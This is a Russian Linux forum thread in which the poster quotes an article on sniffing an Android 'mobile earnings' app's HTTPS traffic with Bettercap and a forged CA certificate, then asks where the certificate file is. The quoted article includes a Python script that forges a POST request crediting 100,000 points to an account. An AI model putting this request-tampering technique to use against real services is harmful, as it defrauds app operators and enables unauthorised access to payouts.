LINUX.ORG.RU

Не могу найти сертификат

 


0

1

В интернете наткнулся на статью:

«Сегодня я хотел бы показать на примере, как халатно относятся разработчики приложений для „мобильного заработка“ (заработка разработчиков, естественно) к безопасности своих программ.

Инструменты: Bettercap На Kali Linux:

sudo apt-get install build-essential ruby-dev libpcap-dev sudo apt-get install bettercap

На других Linux-системах:

git clone https://github.com/evilsocket/bettercap cd bettercap gem build bettercap.gemspec sudo gem install bettercap*.gem VM либо телефон на android с play market Устанавливаем приложение. Достаточно набрать в поиске гугл плей что-то вроде „Мобильный заработок“ или „Накрутка лайков вк“ и т.д. Я выбрал с картинкой посмешнее и названием поглупее.

Поддельный сертефикат. Большинство приложений сегодня используют https соеденение. Что бы мы могли расшифровать трафик, будем использовать поддельный сертефикат. Таковой уже имеется в Bettercap в директории /sudo/.bettercap/bettercap-ca.pem . Его нужно установить на телефон (настройки > безопасность > сертефикаты).

Начинаем снифать трафик. В консоли компьютера пишем: sudo bettercap -T 192.168.0.100 —proxy-https —sniffer

Где -T - ip телефона --proxy-https - использовать прокси с поддельным https сертефикатом для расшифровки траффика --sniffer - запустить сниффер пакетов.

Исследуем трафик приложения. Теперь, когда трафик отслеживается, поклацаем по разным кнопкам и попробуем выполнить задание.

Я нашёл для себя интересными два запроса:

получил бонус

[192.168.0.100] POST %ссылка% ( text/html ) [200]

[REQUEST HEADERS] 'User-Agent' : %user_agent% 'Content-Type : application/x-www-form-urlencoded' 'Content-Length : 44' Host : url.bitcoin-miner.ru Connection : close Accept-Encoding : identity

[REQUEST BODY] userid : %user_id% points : 100 type : Daily_Reward_v2

Выполнил задание

[192.168.0.100] POST %ссылка% ( text/html ) [200]

[REQUEST HEADERS] User-Agent : %user_agent% Content-Type : application/x-www-form-urlencoded Content-Length : 40 Host : url.bitcoin-miner.ru Connection : close Accept-Encoding : identity

[REQUEST BODY] username : %user_name% points : 50 type : Vungle_Video

Создаём кастомный запрос. Поэксперементировав с данными из полученых запросов, пишем скрипт для отправки кастомного запроса: import requests link = '%ссылка%' headers = {'User-Agent' : %user_agent%, 'Content-Type' : 'application/x-www-form-urlencoded', 'Content-Length' : '44', 'Host' : 'url.bitcoin-miner.ru', 'Connection' : 'close', 'Accept-Encoding' : 'identity'} payload = {'userid' : %user_id%, 'points' : 100000, # да да, можно поставить столько монет, сколько захочешь 'type' : 'Vungle_Video'} r = requests.post(link, headers=headers, data=payload) # можно запихнуть в цикл, если бы сервис не разрешал менять колличество получаемых очков за раз. print(r.text)

Запрос выполнился с ответом {„result“:„true“,„msg“:„Points Updated“} Очки начислены мне на аккаунт, это, кстати говоря, минимальная сумма выплаты (8$)

Итог. Гугл плей забит подобными приложениями, разработчики которых зарабатывают на желании быстрой наживы у неокрепших умов. Чаще всего, правда, создатели совсем не заботятся о безопасности своего детища. В этом случае мне пришлось поэксперементировать с запросами, но что-то мне подсказывает, что во многих подобных приложениях можно просто циклично переотправить один запрос, выдающий монетки за выполненное задание.»

Столкнулся с такой проблемой Не могу найти сертификат /sudo/.bettercap/bettercap-ca.pem Помогите)) Спасибо


Э... а в чем вопрос? Накрутка лайков и прочее — мутный заработок, если не сказать нелегальный. Неудивительно, что на безопасность всем насрать. Не говоря уж о том, что такие софтины запросто могут содержать трояны или чего похуже.

Vsevolod-linuxoid ★★★★★
()
Последнее исправление: Vsevolod-linuxoid (всего исправлений: 1)
Ответ на: комментарий от Vsevolod-linuxoid

Ну чего ты какой непонятливый, «в чём вопрос?», как маленький. Вот человек тоже хочет немного заработать, почти честным трудом. Видишь, в статье про сертификат а у него в кали такого нет. Вот и спрашивает. Можешь помочь — не нуди, просто скажи где такой взять. Не можешь — проходи мимо, не мешай серьёзным людям делами заниматься.

sin_a ★★★★★
()
Ответ на: комментарий от sin_a

Ну в таком случае это пункт 18 оффтопик-листа, «Зловредный код». Но как я понял из статьи, данный ключ нужен не для работы приложений по накрутке, а для их анализа.

Vsevolod-linuxoid ★★★★★
()
Последнее исправление: Vsevolod-linuxoid (всего исправлений: 1)
Ответ на: комментарий от Vsevolod-linuxoid

Охотно верю. Я даже не читал, как те нейросети по запаху текст распознал. Возможно и ошибся. В таком случае, автор получил бесценный опыт: вопрос надо формулировать так, чтобы у всяких дураков типа меня не возникало ошибочных предположений.

sin_a ★★★★★
()
Ответ на: комментарий от sin_a

Да я тоже не сразу въехал. А ТСу я бы советовал убедиться, что ключа действительно нет: по малоопытности он мог не включить отображение скрытых файлов.

Но все равно непонятно, чего он хочет. Для накрутки этот сертификат не нужен. А смысл проводить анализ таких приложений — неясен.

Vsevolod-linuxoid ★★★★★
()
Последнее исправление: Vsevolod-linuxoid (всего исправлений: 2)
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.